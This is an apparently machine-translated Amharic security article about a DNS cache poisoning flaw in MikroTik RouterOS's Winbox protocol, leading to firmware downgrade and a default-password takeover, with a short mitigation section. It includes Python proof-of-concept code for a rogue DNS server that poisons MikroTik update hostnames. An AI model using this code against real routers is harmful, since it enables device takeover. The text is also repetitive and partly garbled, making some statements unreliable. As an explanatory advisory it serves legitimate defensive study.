በራውተር ኦኤስ ውስጥ ያለው የኋላ ፖርት ተጋላጭነት በመቶ ሺዎች የሚቆጠሩ መሳሪያዎችን ያስፈራራል።

በራውተር ኦኤስ ውስጥ ያለው የኋላ ፖርት ተጋላጭነት በመቶ ሺዎች የሚቆጠሩ መሳሪያዎችን ያስፈራራል።

በ RouterOS (Mikrotik) ላይ ተመስርተው መሳሪያዎችን ከርቀት የማውረድ ችሎታ በመቶ ሺዎች የሚቆጠሩ የኔትወርክ መሳሪያዎችን አደጋ ላይ ይጥላል። ተጋላጭነቱ የዊንቦክስ ፕሮቶኮል የዲ ኤን ኤስ መሸጎጫ ከመመረዝ ጋር የተያያዘ ነው እና ጊዜው ያለፈበት (በነባሪ የይለፍ ቃል ዳግም ማስጀመር) ወይም የተሻሻለ firmware ወደ መሳሪያው እንዲያወርዱ ያስችልዎታል።

በራውተር ኦኤስ ውስጥ ያለው የኋላ ፖርት ተጋላጭነት በመቶ ሺዎች የሚቆጠሩ መሳሪያዎችን ያስፈራራል።

የተጋላጭነት ዝርዝሮች

የራውተር ኦኤስ ተርሚናል የዲ ኤን ኤስ ፍለጋዎችን የመፍትሄ ትዕዛዝ ይደግፋል።

በራውተር ኦኤስ ውስጥ ያለው የኋላ ፖርት ተጋላጭነት በመቶ ሺዎች የሚቆጠሩ መሳሪያዎችን ያስፈራራል።

ይህ ጥያቄ የሚስተናገደው በሁለትዮሽ በተሰየመ ፈቺ ነው። መፍታት ከ ራውተር ኦኤስ ዊንቦክስ ፕሮቶኮል ጋር ከተገናኙት በርካታ ሁለትዮሾች አንዱ ነው። በከፍተኛ ደረጃ ወደ ዊንቦክስ ወደብ የሚላኩ "መልእክቶች" በድርድር ላይ የተመሰረተ የቁጥር አሰራርን መሰረት በማድረግ በ RouterOS ውስጥ ወደ ተለያዩ ሁለትዮሾች ሊተላለፉ ይችላሉ።

በ RouterOS ውስጥ የዲኤንኤስ አገልጋይ ባህሪው በነባሪነት ተሰናክሏል።

በራውተር ኦኤስ ውስጥ ያለው የኋላ ፖርት ተጋላጭነት በመቶ ሺዎች የሚቆጠሩ መሳሪያዎችን ያስፈራራል።

ሆኖም የአገልጋዩ ተግባር ቢሰናከልም ራውተር የራሱን የዲ ኤን ኤስ መሸጎጫ ይይዛል።

በራውተር ኦኤስ ውስጥ ያለው የኋላ ፖርት ተጋላጭነት በመቶ ሺዎች የሚቆጠሩ መሳሪያዎችን ያስፈራራል።

Winbox_dns_request እንደ example.com ተጠቅመን ስንጠይቅ ራውተር ውጤቱን ይሸፍናል።

በራውተር ኦኤስ ውስጥ ያለው የኋላ ፖርት ተጋላጭነት በመቶ ሺዎች የሚቆጠሩ መሳሪያዎችን ያስፈራራል።

ጥያቄው የሚሄድበትን የዲ ኤን ኤስ አገልጋይ መግለጽ ስለምንችል የተሳሳቱ አድራሻዎችን ማስገባት ቀላል ነው። ለምሳሌ የዲ ኤን ኤስ አገልጋይ አተገባበርን ከ ማዋቀር ትችላለህ ፊሊፕ ክላውስ192.168.88.250 በያዘው መዝገብ ሁል ጊዜ መልስ ለመስጠት።

def dns_response(data):
    request = DNSRecord.parse(data)
    reply = DNSRecord(DNSHeader(
        id=request.header.id, qr=1, aa=1, ra=1), q=request.q)
    qname = request.q.qname
    qn = str(qname)
    reply.add_answer(RR(qn,ttl=30,rdata=A("192.168.88.250")))
    print("---- Reply:n", reply)
    return reply.pack()

አሁን ለምሳሌ ለምሳሌ.com ለመፈለግ Winboxን ከተጠቀሙ የራውተር ዲ ኤን ኤስ መሸጎጫ መመረዙን ማየት ይችላሉ።

በራውተር ኦኤስ ውስጥ ያለው የኋላ ፖርት ተጋላጭነት በመቶ ሺዎች የሚቆጠሩ መሳሪያዎችን ያስፈራራል።

እርግጥ ነው, ራውተር በትክክል ስለማይጠቀም, example.com መመረዝ በጣም ጠቃሚ አይደለም. ነገር ግን፣ ራውተር update.mikrotik.com፣Cloud.mikrotik.com፣Cloud2.mikrotik.com እና download.mikrotik.comን መድረስ አለበት። እና ለሌላ ስህተት ምስጋና ይግባውና ሁሉንም በአንድ ጊዜ መርዝ ማድረግ ይቻላል.

def dns_response(data):
    request = DNSRecord.parse(data)
    reply = DNSRecord(DNSHeader(
        id=request.header.id, qr=1, aa=1, ra=1), q=request.q)
    qname = request.q.qname
    qn = str(qname)
    reply.add_answer(RR(qn,ttl=30,rdata=A("192.168.88.250")))
    reply.add_answer(RR("upgrade.mikrotik.com",ttl=604800,
        rdata=A("192.168.88.250")))
    reply.add_answer(RR("cloud.mikrotik.com",ttl=604800,
        rdata=A("192.168.88.250")))
    reply.add_answer(RR("cloud2.mikrotik.com",ttl=604800,
        rdata=A("192.168.88.250")))
    reply.add_answer(RR("download.mikrotik.com",ttl=604800,
        rdata=A("192.168.88.250")))
    print("---- Reply:n", reply)
    return reply.pack()

ራውተር አንድ እርዳታ ጠይቋል፣ እና አምስት መልሰው እንሰጣለን። ራውተሩ እነዚህን ሁሉ ምላሾች በስህተት ደብቋል።

በራውተር ኦኤስ ውስጥ ያለው የኋላ ፖርት ተጋላጭነት በመቶ ሺዎች የሚቆጠሩ መሳሪያዎችን ያስፈራራል።

በግልጽ ለማየት እንደሚቻለው ይህ ጥቃት የራውተር ደንበኞችን ማጥቃት ስለሚፈቅድ ራውተር እንደ ዲ ኤን ኤስ አገልጋይ ከሆነ ጠቃሚ ነው።

እንዲሁም፣ ይህ ጥቃት የበለጠ ከባድ ተጋላጭነትን ለመጠቀም ያስችላል፡ የራውተር ኦኤስን ስሪት ዝቅ ማድረግ ወይም ወደ ኋላ መመለስ። አጥቂው የዝማኔ አገልጋይ አመክንዮ ለውጥን ጨምሮ፣ እና ራውተርኦኤስ ጊዜው ያለፈበትን (የተጋላጭ) ስሪት እንደ ወቅታዊ አድርጎ እንዲቀበል ያስገድደዋል። እዚህ ያለው አደጋ ስሪቱን “ስታሻሽሉ” የአስተዳዳሪው ይለፍ ቃል ወደ “ነባሪ” እሴት እንደገና በመጀመሩ ላይ ነው - አጥቂ በባዶ የይለፍ ቃል መግባት ይችላል!


ምንም እንኳን ጥቃቱ በጣም እየሰራ ነው ደራሲ ከሌሎች ነገሮች ጋር የተያያዙ በርካታ ተጨማሪ ቬክተሮችን ተግባራዊ ያደርጋል በ firmware ውስጥ የኋላ በር መክተትነገር ግን ይህ ቀድሞውንም ያልተለመደ ቴክኖሎጂ ነው እና ለህጋዊ ዓላማዎች መጠቀሙ ህገወጥ ነው።

መከላከል

በቀላሉ ዊንቦክስን ማሰናከል እነዚህን ጥቃቶች ለመከላከል ይረዳል። በዊንቦክስ በኩል የአስተዳደር ምቾት ቢኖረውም, የ SSH ፕሮቶኮልን መጠቀም የተሻለ ነው.

ምንጭ: hab.com

አስተያየት ያክሉ